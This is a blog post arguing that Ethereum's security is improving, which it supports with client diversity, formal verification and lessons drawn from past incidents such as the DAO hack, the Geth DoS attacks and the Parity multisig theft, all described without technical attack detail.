Ethereum: Full Featured Yet Highly Resilient

The Rivalry Between Bitcoin And Ethereum: A Brief History

If you were to casually browse one of the communities dedicated to Bitcoin and ask someone what they think about Ethereum, how it compares to Bitcoin, the potential it represents and the likelihood of it becoming the dominant crypto, you would quickly encounter a prevalent point of criticism, oft repeated like a mantra.

“Ethereum isn’t as Secure as Bitcoin

Pundits, developers, thought leaders and other notable figures in the Bitcoin sphere have appropriated this narrative and contributed to it becoming ingrained and an integral part of the collective consciousness in the crypto community.

With this article i’m going to argue why I think they’re wrong.

ethereum-bitcoin-1.jpg

I approached the scene in 2011, and like so many others I was compelled by Satoshi’s vision of a world were people could trade goods and services using a novel peer to peer, decentralized and trustless digital form of cash.

Eager to participate in this nascent sector I started mining and frequenting some of the more technically minded communities. I did so in order to get a sense of how this newfangled Blockchain tech based on an arcane mix of cryptography, economics, p2p networking and game theory was revolutionizing the way a digital asset could be issued, secured and transacted.

As the space matured and the first contenders to the Bitcoin throne materialized, I started to notice a worrying trend of stagnation in the Bitcoin ecosystem. With individuals often resorting to a dismissive approach with every new coin that tried to do something new, risky or unique. Deviating from the established formula that served Bitcoin so well and made it so successful (PoW, minimal scripting language, UTXO model) was branded as heresy and every attempt was considered to be destined for failure even before the network went live.

Bitcoin Maximalism – the belief that Bitcoin is the superior platform by virtue of its scarcity, security properties and network effect – coalesced as a school of thought. As more and more zealots started to pick up the banner for this faction, they inevitably contributed to the balkanization of the ecosystem and the rampant tribalism that is now prevalent.

When Vitalik Buterin started researching, designing and proposing the idea that would become Ethereum, many people (especially in the Bitcoin community) thought it was unlikely to work; they posited that even if it did, such a system would be fraught with security vulnerabilities. Some of the criticism levied against Ethereum is based on the assumption that its main feature of being built on top of a Turing Complete language is also it’s main downside because of the huge attack surface it represents.

104664736-GettyImages-500445678-ethereum.1910x1000.jpg

After the creation of the genesis block and successful deployment of the Ethereum mainnet, things rapidly escalated in a crescendo of fury and accusations. The DAO Hack and subsequent hard fork, widely viewed by the Bitcoin community as a bailout and the violation of “the code is law” tenet only exacerbated the situation. After the DAO hack, the Ethereum devs took the only possible route (in their eyes) to salvage the viability of the project and  with a coordinated effort managed to hard fork the network, invalidating and reverting the DAO hack.

It became apparent there was urgent need of a concerted and multi pronged initiative to shore up attack vectors and increase security.

Ethereum strikes back, Formal verification and multiple clients

ethnodes

Ethereum has currently 3 clients, Geth(Written in Go), Parity(written in Rust) and Harmony (written in Java) with one more coming fairly soon, being developed as an internal project at Consensys by the Pegasus Team. As demonstrated by the Devcon2 DoS attacks, having a diverse set of clients based on a different codebase but implementing the same spec and interoperability is a major boon for the security and resilience of the network. This is great for security because if a fatal flaw like a DoS attack vector , RCE or other nasty show stopping bug (even if not exploitable) is found in a specific client the entire network doesn’t necessarily go down and it raises the cost for an attacker significantly.

When an unknown attacker exploited a DoS bug in Geth in October 2016 the network was severely impaired. Thanks to a healthy mix of nodes running the Parity client that were less affected by the specific issues being exploited, Ethereum continued to chug along. After the developers introduced new optimizations, the client stabilized and eventually recovered becoming once again usable. Being widely adopted has resulted in a wide array of security incidents but this is an invaluable opportunity to test the security of a system in a real world scenario.

Ethereum, being valuable and widely adopted is basically offering a perpetual bug bounty for critical security vulnerabilities, incentivizing bad actors to throw everything they got at it. This is making the network stronger and I think the metaphor used by Andreas Antonopoulos to describe the adaptive nature of Bitcoin is very apt and also applicable to Ethereum:

“In the meantime, Bitcoin isn’t living in a bubble. Bitcoin is a sewer rat. It’s missing a leg. Its snout was badly mangled in an accident last year. It’s not allergic to anything. In fact, it’s probably got a couple of strains of bubonic plague on it which it treats like a common cold. You have a system that is antifragile and dynamic and robust.”

This is largely accurate but if Bitcoin is a sewer rat then Ethereum is a whole pack of them, not being beholden to a single entity like Bitcoin is with the Core team and Blockstream. As time passes, we are starting to see another very important technique in the strategy to strengthen Ethereum’ security is Formal Verification.

Formal Verification is a procedure by which the desired properties of a piece of code are mathematically verified to lead to a defined set of possible outcomes thus negating the ability for an attacker to maliciously manipulate inputs in such a way to end in an unexpected state. While Formal Verification isn’t a panacea for all security issues it can significantly reduce the attack surface of applications and clients; together with regular audits conducted by reputable firms, technically knowledgeable community members and bug bounties it’s an important effort to improve the security posture of Ethereum.

wallpaper-homestead.jpg

Yes, the application layers residing on top of Ethereum are regularly suffering from security vulnerabilities. Is that bad for Ethereum? No.

On the traditional Internet websites are getting hacked daily.

Is it the fault of TCP/IP and the underlying OSI model? No.

Has it discouraged adoption of the internet as a communication, computing and commerce medium? No.

Is the security of Ethereum ideal right now? Certainly not, as evidenced by the parity hack where an internal method in a library used by a lot of MultiSig wallets had mistakenly been assigned public access and was able to be called by anyone, allowing hackers to steal over $30M USD worth of Ether.

But it’s constantly getting better.

As the ecosystem, tooling and documentation improves and security best practices are adopted we’ll gradually see a decrease in critical security incidents affecting Dapps and Smart Contracts.

Don’t fear the hacks, embrace them, as this will ensure that security is going to improve and Ethereum has a bright future ahead.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s